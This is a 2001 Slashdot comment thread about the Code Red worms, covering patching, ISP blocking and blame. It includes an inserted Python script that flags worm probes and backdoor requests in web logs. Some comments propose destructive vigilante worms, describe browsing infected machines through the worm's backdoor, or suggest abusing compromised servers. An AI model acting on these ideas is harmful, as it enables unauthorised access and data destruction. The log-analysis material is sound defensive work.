    Please let me know when you decide whether I'm a "cockbiter" or a "pillowbiter".

    And by the way, Coward, I'm a junior computer science & engineering major at a well-respected private university where I am the chairman of the Association for Computing Machinery (ACM). I also have a high IQ and don't hesitate to arrogantly and effectively deal with scum like yourself.

    Have a nice day :-D

    --

    If you celebrate Xmas, befriend me (538
  196. I feel so left out... by Maditude · · Score: 2, Informative

    Ever since Mediaone/AT&T started blocking port 80 (as of 2am last Monday here in Minnesota), I've been jealously watching you guys get to have all the fun.

    On the bright side, I have gotten acknowledgement from RRcustomercare (Mediaone/ATT/RR/pick one fscking name already!) that yes, technically it is okay to run a server as long as you don't negatively impact others. Then again, they are still saying that until this worm dies out, none of their customers will be seeing any incoming packets on port 80. :-(

  197. Re:less talk...more help by linuxrochester · · Score: 0

    If all of these admins had half a brain, they would have patched their servers already!!! As for the "hidden" box, they can't be very good at what they do, if they DIDN'T KNOW THE BOX EXISTED!!! I wouldn't send them email stating Apache is better, I would tell them patch your sh*ty IIS server U f*cking worthless admin, then find a new career!!!!

  198. One problem.... by JohnTheFisherman · · Score: 3, Insightful
    People need to patch servers that don't know they're servers. I have RoadRunner (cable modem), and I looked at my logs, and decided to try and track a few people down via http://ipattackingme. Almost none of them had a website up - just the stock 'page under construction.' So I suspected (and RR tech suppt. confirmed this) that most of these people are running IIS and DON'T KNOW THEY'RE RUNNING IIS.

    RoadRunner is additionally trying to shut down individual cable modems, rather than some of the more extreme measures other providers are using (like killing port 80), so kudos to them. Please get the word out to anyone running 2K or NT to check their box, not just anyone who KNOWS they're running a website.

    1. Re:One problem.... by barneyfoo · · Score: 2

      Ahhhhhhh.... so THAT'S how microsoft is increasing its IIS share on netcraft.com. Interesting :)

  199. Never Patch IIS Again! by nlabadie · · Score: 1

    Tired of applying patches to IIS? Tired of checking if your machine is infected with CodeRed? I've found the cure-all. And best of all, it's free!

  200. Re:It's not like they haven't announced the patch by Have+Blue · · Score: 2

    There's also the subtle difference that flaws in Microsoft products don't kill people.

  201. When compared to Star Wars... by 10Ghz · · Score: 1

    In Star Wars, episodes 1, 2 and 3 suck, while episode 4 is good, and it gets better in 5. It then starts to die in episode 6.

    What does that mean when it comes to Code Red? We haven't seen nothing yet! You thought episodes 1 and 2 were bad? Wait 'till we get to 4 and 5!

    --
    Lesbian Nazi Hookers Abducted by UFOs and Forced Into Weight Loss Programs - -all next week on Town Talk.
  202. less talk...more help by jcw2112 · · Score: 2, Insightful

    I spent a couple of hours yesterday sending out emails to just about everyone that hit my box at home. Just toss the IP into a browser and get some contact info from the site that comes up (if one does come up). I got MANY replies thanking me for finding that "hidden" box on their network.

    And no, this isn't the time to send off an email that says "ditch your M$ crap and goto apache" because most of these poor admins aren't running IIS because they WANT to...it's what they HAVE to do.

    So let's take back some bandwidth already!

    --
    hmmm...
    1. Re:less talk...more help by jcw2112 · · Score: 1

      To be more clear about MY experience: at LEAST 4 of the responses I got were from people who were not what anyone would call "Administrators" but instead were working for small shops and wearing too many hats. I am a firm believer that if you have a web site that you need to have professionals that will take care of your system. But the world doesn't work like that. In the US we require a drivers license...does that mean that everyone on the interstate has one? I doubt it.

      Back to my point: the FIRST priority is to get this thing under control. If someone hasn't patched it by now, they are OBVIOUSLY not a professional admin. Telling them that they are "worthless" isn't going to win any cooperation as it's just pointing out the obvious. I think we need to be a little more pragmatic.

      --
      hmmm...
    2. Re:less talk...more help by AlXtreme · · Score: 1
      And no, this isn't the time to send off an email that says "ditch your M$ crap and goto apache" because most of these poor admins aren't running IIS because they WANT to...it's what they HAVE to do.

      Well, the code red worm should be enough to convince any manager about the dangers of IIS/Windoze software. I mean, they watch tv, don't they? Do THEY want bad pr because their servers are infected? Do THEY want to lose cash because of all the megs of viri-data that is sent? Tell them about a very secure server, that serves most of the internet's sites. Also tell them about the utter lack of high-profile bugs and holes, and auto-updating software (aka apt-get).

      That should get any null-minded $$$-focussed manager to give you a go for it. Don't mention open-source, it's likely to work backward for your cause. Open-source still has the hobby-tag put on it of 4 years ago. (well, not with the managers with an ounce of IT know-how, but they should be running opensource software already ;)

      The only real reason to not use Apache et al is the use of ASP, but Apache has long had support for that, euhm, language kinda-thingy.

      Oh well, my post is kinda off-topic, just want to say that if the admin really wants to, he just has to flip the right switches. I'm with you with helping out instead of trolling, I mean, not everyone has seen the light yet, but that's no reason to be a pain in the ass...

      --
      This sig is intentionally left blank
  203. Re:Microsoft should be sued by Keith+Russell · · Score: 3, Insightful
    ...I still think Microsoft is guilty here because their customers weren't aware their Windows-running boxes could start chewing up bandwidth...
    If you are a sysadmin responsible for any server, regardless of operating system, it's your job to be aware. Microsoft's poor record may drive up the frequency of patches, but that doesn't change the fact that the difference between a good sysadmin and a bad one is the knowledge that no server runs itself.
    --
    This sig intentionally left blank.
  204. Re:Bah. by isorox · · Score: 1

    Cable modems in the UK are new (been out for just over a month in my town). I think I'm pretty much the only one (well, there's about 50, going by random pinging - broadcast doesn't work) on my subnet, which is probably a town of 150-200,000.

    I've only got 2 attempts in 2 weeks from my subnet.

    Our university's student union servers were getting the same number of hits as me up to a couple of days ago.

  205. Re:a harsher solutions, perhaps? by Anonymous Coward · · Score: 0

    Maybe it's the fact that you're an absolute moron. Think so? I do.

  206. Re:Bah. by Anonymous Coward · · Score: 0

    Did you read it at all? This proprietary software won't run with the net patch. Moron. They're currently working on fixing it. I think Apache with mod_proxy would be the best temporary fix.

  207. Re:make some money off banner ads by Anonymous Coward · · Score: 0

    Oh my god. I hope you're being funny because if you wrote that post in seriousness you should commence suicide procedures immediately.

    Wow, a respected private college...and you've learned so much that you "correct" people using the generally accepted shortform for IP address? That's sad. I see from your other posts that you've taken to filling the grammar-Nazi role. That's just fuckin' sad (by the way: I would gauge that you are both a pillowbiter and a cockbiter).

    By the way, dildo, it's "appalled", not "appaled".

    Get back to your masturbation little boy.

  208. Perhaps REAL Damage will Fix the Problem by Bilbo · · Score: 2
    Root problem here is NOT so much the fact that MS makes buggy servers. Let's face it. Any software can have bugs. MS DID release a patch.

    The problem is freaking clueless users installing web servers and then not maintaining them!

    What we really need is a variant of Code Red that completely hoses any computer that it hits -- something that people can't overlook. Then and only then will the clueless twits running these servers get the idea that they have to be responsible when they expose themselves to the Internet.

    Any volunteers?

    --
    Your Servant, B. Baggins
    1. Re:Perhaps REAL Damage will Fix the Problem by CM39 · · Score: 1


      It runs as a service without even an icon in the taskbar.

      --

      "PMS is the time of the month when women act like men do all the time"
      Robert Heinlein
    2. Re:Perhaps REAL Damage will Fix the Problem by sjonke · · Score: 1

      I looked into one case and they did not know that IIS was running, and yes, they upgraded from NT 4.0 to Windows 2000. I don't know them personally nor have I talked with the owner directly, so I have no idea if they're an idiot, but I'd say the idiots are at Microsoft, not this particular user. Microsoft is the master of bad/confusing design. If Windows 2000 doesn't enable IIS by default (which is what I was told) then either there is a bug that sometimes enables it, or there is a UI design that results in people sometimes accidentally enabling it.

      --
      --- What?
    3. Re:Perhaps REAL Damage will Fix the Problem by RWC09 · · Score: 1

      If these people are not idiots then how could they either not know that they installed the server or/and not know that the server is running!

      --
      -->If Linux was written by Bill Gates & Co. - no one would want to switch !!
    4. Re:Perhaps REAL Damage will Fix the Problem by CM39 · · Score: 1


      I mentioned in another post that I personally know three people who were not even aware they were running servers.

      They upgraded to win2k pro for the multi-tasking and stability and either somehow installed the server during installation or while playing around with "add/remove windows components"

      Two of these three people are not stupid, but when you don't know a server is running it's difficult to patch it. I imagine if I know three cases there are probably thousands if not tens of thousands more.

      I think the real stupidity was MS bundling it with the OS, they should have made it a separate free download for people who knew they wanted it or at least made installing it much more difficult.

      Microsoft has built a reputation on making windows idiot proof, but in this case have only proved themselves to be idiots.

      I imagine if these people had been doing everything they should have to protect their systems they would have been running firewalls which might have been blocking port 80 but the majority of computer users don't and Microsoft should have anticipated this issue.

      --

      "PMS is the time of the month when women act like men do all the time"
      Robert Heinlein
  209. Re:Oh please, did you see Urban Legend II? by optikSmoke · · Score: 1

    Hey cool..... I live in Peterborough too, and always thought the architecture at Trent University was pretty cool (which, BTW, is why they chose it as the location to film Urban Legends II)
    maybe I should go see that sometime...

  210. Maybe they should make a prequel by Anonymous Coward · · Score: 0

    Code Red -3: The Internet Menace
    Code Red -2: Attack of the Reds

  211. Symptoms of Code Red 3? by robbyjo · · Score: 1

    I wonder if the symptoms of Code Red 3 are similar to those of the second version here or here? Or probably the first version?

    --

    --
    Error 500: Internal sig error
  212. Re:Copycats by Syberghost · · Score: 5, Insightful

    Get over it. Code Red is dead.

    The folks here at the Fortune 500 company I work for who have been working around the clock since Wednesday trying to clean up this mess will be real happy to hear that you don't believe it exists.

  213. OT! by Anonymous Coward · · Score: 0

    http://slashdot.org/askslashdot/99/11/11/0249242.shtml

  214. Re:Bah. by Syberghost · · Score: 2

    FYI, there appear to be some differences in the terminology between versions, and at least one major AV vendor *cough*McAfee*cough* has crucial details wrong.

    What CERT calls "Code Red II" is the third iteration, and that's what hit us. Some others are calling it III, and McAfee claims II doesn't run on NT. Which is bullshit.

  215. Re:More info? by loraksus · · Score: 2

    http://loraksus.d2g.com/access.log
    There, seems that there are lots of dumb asses in my IP range.

    --
    1q2w3e4r5t6y7u8i9o0pqawsedrftgthyjukilo;p'azsxdcfvgbhnjmk,l.;/
  216. Tired of waiting. Time for C4! It nukes C:\WINNT by Anonymous Coward · · Score: 0
    I'm sick of my cablemodem ISP telling me there's nothing they can do and to bear with them. Fuck that. It's time for some good ol' vigilante justice.

    It's time to modify the Code Red 3 virus into Code Red 4, or C4 (ironic name), and code it to either disable all networking functionality on WINNT machines or just nuke the C:\WINNT directory entirely. Of course it will have to not do this immediately in order to spread to all Win boxes.

    ISPs and Microsoft had many chances to correct it. What has been the effect so far?

  217. Re:Bah. by MeowMeow+Jones · · Score: 2

    Or you could just disable the ISAPI mapping to .ida extensions in IIS (and everything else you don't intend to use). Just right-click on "Default Web Site" in MMC and you should find it pretty quick.

    --

    Trolls throughout history:
    Jonathan Swift

  218. Not SYSTEM-level access.... by |0|4 · · Score: 1

    Actually, while the copy of cmd.exe in /scripts and /msadc can be used to run arbitrary commands, these commands will be run with the privilege level of the IUSR_MACHINENAME account - which defaults to GUEST privileges. So you can't do something fun like grab sam._.

    A 'wider' backdoor, I think, would involve uploading some type of privilege escalation tool, to give IUSR_MACHINENAME admin rights. Now _that_ would be useful...

    --
    reverend lola
    the titanium sheep
    provider of steel wool
    1. Re:Not SYSTEM-level access.... by SydBarrett · · Score: 2

      "But Code Red II created virtual drives which allowed you to access cmd.exe directly via a corrupt explorer with root rights. So it had a pretty large back door to begin with - I look forward to the analysis of Code Red III if such a thing exists."

      You sure about that? A friend of mine got infected (it's gone now) and told me about it. Just for kicks, I tried the exploit on him. Nothing dangerous, and I let him know in advance what I was doing. When I tried to do a simple "Copy file1 file2", I got an access denied error. Maybe I was doing it wrong, or something. Still, it was fun seeing everything on his hard drive. Anything that was text could be viewed with "type filename", despite missing headers. Hell, with a web server log of infected machines and a port scanner to see if port 80 is still running, you can have lots of fun sneaking around.

      Note: The last part is true with a lot of servers in Japan.

  219. Re:An ETHICAL way to Anti-Virus by Slur · · Score: 1

    ...and that script, whatever else it does should simply *not respond* or print anything back to the virus. I believe that if you just let the script hang the virus assumes there's nobody listening and moves on....

    --
    -- thinkyhead software and media
  220. Use Open Source to Fight Code Red by isn't+my+name · · Score: 4, Interesting

    Tom Liston came up with a cool idea for slowing Code Red and other TCP port scanners. He didn't have the bandwidth to host it, and I offered. So, this is a shameless plug, but if we can get enough of us doing this and get some press coverage, it's a great story that shows the power and speed with which open source solutions can be implemented. He first posted the idea on 7/31, just before Code Red started heating up again. Using the Trinux (http://www.thrinux.org) Linux distribution, he cobbled together a floppy boot image that, with unused IP addresses and an old machine, can be used to slow the scans by responding to the initial TCP three-way handshake and then ignoring everything else. The automated scanner has to time out before that thread can move on. According to reports on the SANS Intrusions discussion list, it seems to slow all variants of Code Red and RPC scans as well. His announcement of LaBrea is at: http://www.incidents.org/archives/intrusions/msg01368.html

    1. Re:Use Open Source to Fight Code Red by gblues · · Score: 1

      The only problem is that the Code Red spawns 600 threads, and uses non-blocking sockets. That means that the only thing you've managed to do is slow down 1 of 600 threads; the other 599 are still going as fast as possible.

      Nathan

    2. Re:Use Open Source to Fight Code Red by Anonymous Coward · · Score: 0

      That link for the announcement should be:

      http://www.incidents.org/archives/intrusions/msg01368.html

    3. Re:Use Open Source to Fight Code Red by Anonymous Coward · · Score: 0

      Perhaps you're on to something. It seems to me that the general thrust of TCP/IP firewalling/security has been to try to make the machine invisible to attackers; however, the cliché that "security through obscurity" is worthless comes into play. Maybe somebody could patch up inetd to give it this sort of behavior on inactive ports?

      Maybe the correct approach would be to put this in the TCP/IP stack itself, so that ports actually being used would be exempt...

    4. Re:Use Open Source to Fight Code Red by daveking · · Score: 1
      Not if you do this:

      cd /var/www/html (or apache server root)
      dd if=/dev/urandom of=default.ida count=100000

      Is that so wrong?

      --
      ------DO NOT WRITE BELOW THIS LINE------
  221. Re:Well...at least RR is trying to help... by reflective+recursion · · Score: 1

    I sure hope so. I got 625 attempts yesterday and 358 today so far (5pm). That (625) is DOUBLE what I was getting around Aug 3-7th.

    --
    Dijkstra Considered Dead
  222. I've tried and tried, but... by Anonymous Coward · · Score: 0
    I still can't figure out what Code Red does!!!

    Yeah, now we all know I'm not too bright.

    I know it overflows the IIS buffer, I know it infects other computers. Does it cause harm? Does it tell you that you've been screwed over by Code Red? I'm sitting on an NT server machine behind Novell-controlled proxies and some good firewall protection, so I haven't witnessed what it does. I installed the patch as soon as I could get it, but assuming I contracted the deadly Code Red, what exactly would/could happen...

    I'd appreciate a short explanation or a URL that explains Code Red a little better than "it spreads and multiplies."

  223. Re:Sig (Offtopic(Offtopic)) by Fishstick · · Score: 0, Offtopic

    He he, yeah... that one has been around for a while but is still funny.

    At work I have a penny jar (pretty good sized gallon apple cider jug) full of change on which I have taped a sign that says the same thing, except for 'penny' instead of 'nickel'.

    Initially I got some funny looks from people who came by my cube, now they come over and drop a penny in every time their machine locks up*.

    *except now we are all using w2k and we don't get crashes much; people now mostly come over to raid the jar for the odd nickel and dime for the coke machine.

    --

    There is much cruelty in the universe, John.
    Yeah, we seem to have the tour map.

  224. Re:ok you bigots :) by baptiste · · Score: 2

    That's Code Red II, released in the wild Aug 4th. CRv2, the second variant of the original worm, hit July 19th and again on Aug 1st. The ORIGINAL Code Red hit in early July - had a crappy IP gen routine and made little to no news cause it didn't go very far.

  225. Re:Bah. by ednopantz · · Score: 1

    People use MS for no reason

    No. People use MS because their company already has the client licenses, the admins are cheaper, their desktops and servers use a single set of security procedures and, for web hosting, they can port their desktop vb apps to IIS in no time.

    If you already own 400 Win boxes, there is a pretty compelling argument for using a Win server product.

    That said, I would be real careful what I used IIS for. I don't think I would expose confidential data to the extranet.

  226. Re:Microsoft should be sued by Anonymous Coward · · Score: 0

    I don't buy into that whole "it's the admins' fault" argument. It's not the responsibility of the buyer to make sure a product works as advertised. Now, if in the IIS box there came a nice big pamphlet that said "this software has bugs, be sure to update it at this URL", then it would be the admin's fault, since they would have been warned. But it would surprise me if anywhere inside the box it's mentioned that you've bought faulty software. Marketing wouldn't accept that.

    MS sells an illusion of quality, and it's just that illusion that makes these security problems their fault, and not the admins' fault.

    And to look at it on a bigger scope. Suppose you're a regular home user. You go to the store and buy a PC with Windows preinstalled. Since you get the OEM version of Windows you don't get a nice Windows box, you don't even get a decent manual, all you get is a license and, if you're lucky, a CD. Nowhere are you warned that the very first thing you need to do when you hook up that PC is to go to Windows Update. It's easy to claim that updating your Windows is simple, and I agree with that. But home users are afraid of messing up their system, so they'll only update when told to, which means that MS should very clearly tell them in a leaflet accompanying the new PC that they have to run Windows Update regularly. Again, MS instead tries to sell an illusion of quality. And it is this illusion which has led to the success of Sircam.

  227. Re:Linux to the rescue? by Rimbo · · Score: 2

    "Technically illegal?"

    I don't know...is it illegal to use an open port on a machine if the person doesn't intend for us to use that port?

    Let's say I leave port 80 open on my machine...unintentionally...and furthermore in such a way that private, confidential information can be seen and downloaded. If someone tries to read a web page or surf my now-open web browser, have they really broken any laws?

    I don't think so. Because I'm the one who left the damned thing open.

    An interesting thing about your comment is that perhaps Code Red II was built by white hats in the first place just for this reason -- to open up a back door on all of these folks' machines so that they could do just that. The US government protecting itself? Microsoft doing damage control? Blackhats? Who knows?

    I think that if someone broke a hole in the wall of my house while I was on vacation, and someone came by and went inside my house just so that they could repair that hole, I would be grateful. I certainly wouldn't press charges.

  228. Re:Serious blow to open source & free software by SpinyNorman · · Score: 1

    Seems like the movie people could learn something here too - how to make sequels that are as good as or better than the original.

  229. Re:Part III? by Mnemia · · Score: 1
    The fact the old code red is turned off tells me that they might be linked to the same person(s) or something

    I think it's more likely that because CR2 spreads so much faster than CR1 it has basically wiped out its ancestor. IIRC, version 2 can infect machines already infected with version 1, so due to the faster propagation rate, CR1 should quickly become rare indeed. That seems to be the case at least in my Apache logs...for the first several hours after CR2 began to hit me, the two versions were interspersed, but CR1 soon dropped off to a trickle.
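
The sorting that several posts above do by eye (the access.log loraksus posted, the per-day attempt counts, and the CR1/CR2 interspersing Mnemia describes) can be scripted. The following Python is an added example, not code from any poster in this thread. The log lines are constructed, with source addresses from documentation ranges, and the classification rests on markers the worms left in web server logs: the original Code Red and its CRv2 re-release padded the /default.ida query with N characters, Code Red II padded it with X characters, and Code Red II's backdoor shows up as requests for root.exe (its renamed copy of cmd.exe) under /scripts or /msadc, or for cmd.exe through the /c and /d virtual directories it created. The label names are this example's own.

```python
import re
from collections import Counter, defaultdict

# Constructed sample lines in Apache common log format (not from any real log).
# Addresses come from the RFC 5737 documentation ranges; probe payloads are cut
# down to the prefix a defender keys on, not a complete worm request.
SAMPLE_LOG = """\
192.0.2.10 - - [06/Aug/2001:14:02:11 -0400] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3=a HTTP/1.0" 404 285
192.0.2.10 - - [06/Aug/2001:16:40:12 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3=a HTTP/1.0" 404 285
198.51.100.7 - - [06/Aug/2001:17:05:40 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3=a HTTP/1.0" 404 285
203.0.113.9 - - [06/Aug/2001:17:06:02 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 280
203.0.113.9 - - [06/Aug/2001:17:06:03 -0400] "GET /msadc/root.exe?/c+dir HTTP/1.0" 404 278
192.0.2.55 - - [06/Aug/2001:17:07:19 -0400] "GET /index.html HTTP/1.1" 200 1043
this line is deliberately not in common log format
"""

# Common log format: host ident user [time] "method path proto" status size
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


def classify_request(path):
    """Label one request path, or return None for ordinary traffic."""
    lower = path.lower()
    if lower.startswith("/default.ida?"):
        query = path.split("?", 1)[1]
        if query.startswith("N"):
            return "codered-n"        # original worm and its fixed-RNG re-release
        if query.startswith("X"):
            return "codered-x"        # Code Red II
        return "default.ida-other"    # some other .ida probe; still worth a look
    # Code Red II left cmd.exe copies named root.exe under /scripts and /msadc
    # and exposed the C: and D: drives as the /c and /d virtual directories.
    if re.match(r"^/(scripts|msadc)/root\.exe", lower):
        return "backdoor"
    if re.match(r"^/[cd]/winnt/system32/cmd\.exe", lower):
        return "backdoor"
    return None


def summarize(log_text):
    """Tally labelled requests per variant and per source address.

    Lines that do not parse are counted rather than silently dropped, so a
    format change in the log does not masquerade as a quiet day.
    """
    by_variant = Counter()
    by_ip = defaultdict(Counter)
    ordinary = unparsed = 0
    for line in log_text.splitlines():
        if not line.strip():
            continue
        m = CLF_RE.match(line)
        if not m:
            unparsed += 1
            continue
        label = classify_request(m.group("path"))
        if label is None:
            ordinary += 1
            continue
        by_variant[label] += 1
        by_ip[m.group("ip")][label] += 1
    return {
        "by_variant": dict(by_variant),
        "by_ip": {ip: dict(c) for ip, c in by_ip.items()},
        "ordinary": ordinary,
        "unparsed": unparsed,
    }


def hosts_with_both_variants(summary):
    """Sources seen sending both N-style and X-style probes (CR1 giving way to CR2)."""
    return sorted(ip for ip, counts in summary["by_ip"].items()
                  if "codered-n" in counts and "codered-x" in counts)


def report(summary):
    """Render the summary as plain text, one line per source address."""
    lines = ["probes by variant: %s" % summary["by_variant"]]
    for ip in sorted(summary["by_ip"]):
        lines.append("  %-16s %s" % (ip, summary["by_ip"][ip]))
    lines.append("ordinary requests: %d, unparsed lines: %d"
                 % (summary["ordinary"], summary["unparsed"]))
    both = hosts_with_both_variants(summary)
    if both:
        lines.append("seen with both probe styles: %s" % ", ".join(both))
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(summarize(SAMPLE_LOG)))
```

Feed it a real access log with `summarize(open("access.log").read())`; the per-source counters are what you would hand to an ISP abuse desk, and the unparsed count tells you whether the regex still matches your LogFormat.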

  230. Because of the idiots who trust on microsoft by Lord_Sy · · Score: 1

    It is not Microsoft's fault that the idiots who buy their software trust them and blindly agree to the EULA.

    I won't pay a software company for a bunch of compiled code when I don't actually know how it works, nor what it does!

    You might say those idiots don't even know that other OSes exist. But, if I were forced to use such crappy software, I wouldn't pay for it. Instead I would borrow it, or just steal it.

    I have used Windows 9x since 1998.
    I have it installed on 2 of 3 machines at home.
    I have copied the CD to my friends, and they
    have the "pirated" copy installed on some
    of their computers.
    I never bought a copy.
    I just stole an OEM pack from my past workplace.
    I have a license agreement and a registration
    card not filled in yet (and I will never fill it in).
    I don't like to use pirated software.
    But I'd like to see microsoft in bankruptcy.
    I know I'd enjoy that.

    --
    --- "but all poetry is hostile to capitalism"
  231. Re:You know... by pmz · · Score: 2, Interesting

    Just write a new version that infects IIS, shuts it off, installs a better web server, and voilà, the world is a better place! It would be even better to uninstall IIS, but we all know it's impossible to uninstall Windows software.

  232. Re:Buffer overflow vulnerabilities by The+Wicked+Armadillo · · Score: 1

    (Probably flame bait and needs no response, but I feel I must) No, that is what happens when you do not do any (I think it's called) bounds checking on the data you are getting ready to stick in a non-dynamic space. It is possible to do the same thing with any programming language I can think of (even BASIC, but you would have to write your own routine for it). The problem, although the result of a property of C/C++, is not caused by the language. This is caused by poor coding practices (like not checking the input data for a fixed space), most likely project deadlines, and all of this coupled with poor QA on the product. Please do not blame the language for problems caused by poor code.

  233. Use clear English. by Futurepower(tm) · · Score: 2


    Use clear English when you send messages to non-English-speaking countries. Otherwise there is little chance you will be understood.

    Something like: "Your computer has the Code Red virus! It attacked my computer. See http//www...."

    Include a link to a site which explains how to fix the problem.

    --
    Bush's education improvements were
  234. Re:Please by krappie · · Score: 1
    It's kind of hard to get people to patch their servers when so many people are just sitting there on the default IIS web page. These are the people who don't know how to run or patch a web server. These are the people who don't even know they are running a web server.

    Good luck getting the word out to them.

  235. As with the parent, so with the child. by pmorrison · · Score: 5, Funny

    It usually takes Microsoft 3 releases to get it right. So, when can we expect Code Red .Net?

    1. Re:As with the parent, so with the child. by the_ph0x` · · Score: 1

      It usually takes Microsoft 3 releases to get it right. So, when can we expect Code Red .Net?

      Nah, we still have Code Red III sp3b to get to yet...

      .ph0x

      --

      ---
      ps -aux | grep mind
    2. Re:As with the parent, so with the child. by Anonymous Coward · · Score: 0

      quit while you're ahead

  236. Follow-up viruses? by swngnmonk · · Score: 1

    Out of curiosity - does the MS patch address the fact that CR2 puts administrator-level access in the webroot, publicly available to all? What's to keep someone from writing something that exploits this, looking for boxes that have been patched, and removing the patch - re-enabling the vulnerability to CR? Or surreptitiously opening additional services? Or hell, simply executing del (is that the command in DOS?) c:\? It's a good thing humanity in general hasn't been more vicious yet - every single one of these boxes that have been compromised could have been rendered useless by this point.

    --

    'ARRGH! Pirate Designers of the Internet, we be!'

    1. Re:Follow-up viruses? by dermotfitz · · Score: 1

      now that is a damn good point! Listening Billy?

      --

      How perfectly goddamn delightful it all is, to be sure. - Charles Crumb
    2. Re:Follow-up viruses? by ncc74656 · · Score: 2
      What's to keep someone from writing something that exploits this, looking for boxes that have been patched, and removing the patch - re-enabling the vulnerability to CR? Or surreptitiously opening additional services? Or hell, simply executing del (is that the command in DOS?) c:\?
      NT and Win2K aren't DOS, but DEL is in there. DELTREE is also in NT IIRC, but it isn't in Win2K (not that it'd be hard to copy over Win98's DELTREE and use that).

      An infected server sounds like the ideal place to throw up a warez/pr0n/mp3z site on someone else's nickel...use ftp.exe to fetch a batch file that then builds a directory structure and pulls the files (or "filez," since it's that kind of site) over. If they're too stupid to have patched against CodeRed2, they're probably too stupid to check their logs to find out why their available bandwidth has apparently shrunk to nothing. It'd be an interesting idea to try out, if I had no sense of moral inhibition and/or didn't think I'd get caught. :-)

      Besides, if it's the site of a company you don't particularly like, imagine what would happen if the SPA or BSA came knocking and found Office XP ISOs available for download at http://www.fubared-company.com/warez...

      --
      20 January 2017: the End of an Error.
    3. Re:Follow-up viruses? by malfunct · · Score: 1

      The MS patch only helps machines that have NOT been compromised by the virus. The patch fixes the exploit that is used to get the virus on the machine in the first place, it doesn't fix the virus itself.

      --

      "You can now flame me, I am full of love,"

  237. Saddens me though by Hammer · · Score: 5, Funny

    That Linux and Apache are not compatible.
    We seem to have a good ways to go before everything that runs on Winblows will also run on Linux :-))

    1. Re:Saddens me though by TangoCharlie · · Score: 1

      "That Linux and Apache are not compatible"? Compatible with what? What then is Windows "compatible" with? Itself? That doesn't seem to make sense. Linux as a server platform is now well established... Linux as a mainstream desktop platform is still some way off. Don't worry, it'll happen. Eventually.

      --
      return 0; }
    2. Re:Saddens me though by Fishstick · · Score: 1
      >The comment you were replying to was moderated as funny, so it must be some kind of joke

      they say you ruin the joke if you have to explain it, but in this case there isn't much to ruin...

      The original post (Hammer) seems to try to make a joke of the fact that Apache (and Linux) are not compatible with the series of Code Red worms.

      We seem to have a good ways to go before everything that runs on Winblows will also run on Linux

      Then the reply to this (egburr) plays on the literal interpretation that Apache is not compatible with Linux...

      Yes. I do know what was intended. But, it's fun to take things too literally occasionally.

      And no, I didn't have anything better to do (waiting for a co-worker to get back from cig break to ask her a question before I head out) than to post this. Sue me. :-)

      --

      There is much cruelty in the universe, John.
      Yeah, we seem to have the tour map.

  238. Code Red XP by JiveDonut · · Score: 2
    Let's skip ahead of Code Red IV. I think we should utilize .NET to build a super worm. We'll call it Code Red XP.

    What kind of features should we add? Other than the obvious: Remove Windows and install something else.

    1. Re:Code Red XP by Anonymous Coward · · Score: 0

      I like the way you think!

    2. Re:Code Red XP by Anonymous Coward · · Score: 0

      How about installing a gnutella client which shares their entire harddrive, and also converting any mailboxes to a standard mbox format first, so we can all spy on each other ?

      Make sure to share any CDs in the cd drives too. I'm tired of paying for software.

  239. It's not like they haven't announced the patch by mblase · · Score: 5, Insightful
    Remember the recent Ford Explorer/Firestone fiasco? Firestone made a bunch of flawed tires (when and where is not important here) that were put on these Explorer SUVs, which in some cases fell apart and came off the wheel when driving at high speeds. Investigations were made, and eventually Firestone had to issue a complete recall of the tires.

    The media talked about it for weeks. Ford sent out letters to customers as far as they could find them. People brought their SUVs in, got new tires put on them, drove out. That's how product recalls usually go.

    Software patches aren't all that different. When a hole is discovered, a patch is made. Responsible Microsoft server administrators have the MS site automatically checked on a daily basis for critical updates and patches. Irresponsible admins don't bother, and they become vulnerable and the cause of the worm's spread.

    But it would be insane to propose MS should force-feed this server patch to all their customers. The problem isn't the software, it's the admins. You'd be hard-pressed to find a major newspaper in the civilized world that hasn't mentioned this worm yet, and still there are people who don't bother to patch. They're the same ones who think that server software is just like desktop software, where you're the only one who uses it that really matters.

    Firestone couldn't make its customers bring their SUVs in to have the tires replaced for free, and there's no way the customers could claim ignorance of the problem after the press got done with it. Likewise, Microsoft can't make its customers upgrade their software for free. They've honestly tried to make all their server customers aware of what's expected of them, but they're as powerless to force it to happen as Firestone is to force car drivers to rotate their tires every 6,000 miles.

    1. Re:It's not like they haven't announced the patch by Quay42 · · Score: 1

      What do you think the patch is for? Even Slashdotters' much-adored Apache software isn't immune to the occasional oversight. The difference is that, as yet, almost everyone who runs Apache is a responsible administrator who already knows the importance of keeping things up-to-date.

      Amazing to think that something other than Microsoft products could possibly have bugs! This just rocks my world. Really though, it's good to see someone who can acknowledge that the mighty *n*x OSs are not flawless. Granted, Linux has proved to me enormously more stable than Windows in most instances, but it is by no means perfect, nor are the applications that run on it (and the other UNIX variants).

      I had my phase of "Microsoft is the evil empire, pumping out more and more shoddy code every day" until I actually became a Windows developer (hey, go where the money is) and have found that programs that crash aren't the fault of Microsoft, but rather oversights on my part. Naturally, since most programmers can write bug-free code to start with, I'm obviously in the minority here. Maybe I'm just not good enough to write code that uses some ridiculously obscure and untested API call so I can proclaim "Ah ha! You're in for it now M$!"

      Really folks, Linux and *BSD (and various other variants) are excellent and well-crafted OSs, but the average (and not *necessarily* unintelligent) user likes to use Microsoft products for the same reason that makes AOL the most popular ISP (or close to it) around. John L. User doesn't like to have to edit .rc and .conf files all day long so that their video card and PCI cards will work correctly with their OS of choice. Anyhow, now that I've gone way off topic here, I essentially wanted to say that I agree with the poster that said that Microsoft is doing all it can to make people aware of the bug (go figure, it's a buffer overflow problem, that *never* happens...especially never ever in Linux software!) in their web server and there is no excuse to be an "unconnected" web administrator.

      --
      "Has anything you've done made your life better?" - American History X
    2. Re:It's not like they haven't announced the patch by Anonymous Coward · · Score: 0

      When a ford SUV with firestone tires gets in an accident, only those immediately around them are in danger. If your analogy was valid here, when a tire blew, it would cause tires in China, other states, or Europe to blow.

